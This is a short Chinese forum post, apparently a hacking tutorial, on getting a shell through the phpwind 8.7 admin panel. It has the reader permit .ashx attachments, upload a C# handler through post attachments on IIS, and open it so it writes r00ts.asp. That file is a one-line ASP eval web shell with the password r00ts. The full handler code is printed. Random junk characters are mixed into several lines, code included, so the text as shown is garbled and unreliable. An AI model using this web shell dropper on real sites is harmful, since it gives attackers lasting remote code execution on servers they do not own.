phpwind 8.7 后台拿shell

admin

首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
* F# \) O# O- O1 B' x
) @7 I; |1 N$ |- {# d7 X- B群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
6 u- F" n8 j- N, ~* H% f( P4 s$ `
- M2 \3 M6 q1 h) h* I  C1 S8 Q6 T发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整

3 g! r2 w6 R0 G0 t; U" I6 {然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx

打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
, D% V* w6 |/ B# w' V7 M7 b3 u1 Y
下面是代码:
4 D* E; s5 z; t
<%@ WebHandler Language="C#"Class="Handler" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
: A! `/ @, ^  I( F/ @5 i7 y( Npublic void ProcessRequest (HttpContext context) {
& g& H/ p+ K. e7 D+ R3 z4 a6 jcontext.Response.ContentType = "text/plain";
* P; f$ z+ m, Y4 g2 eStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
file1.Write("<%eval request(\"r00ts\")%>");
5 H, S+ S/ P) M! _! X+ cfile1.Flush();
file1.Close();
* X/ u; W  g+ }' @/ E. z& s% G}
$ x7 {# g$ p) o6 ]public bool IsReusable {
get {
+ D4 t( t( l) areturn false;
}
}
}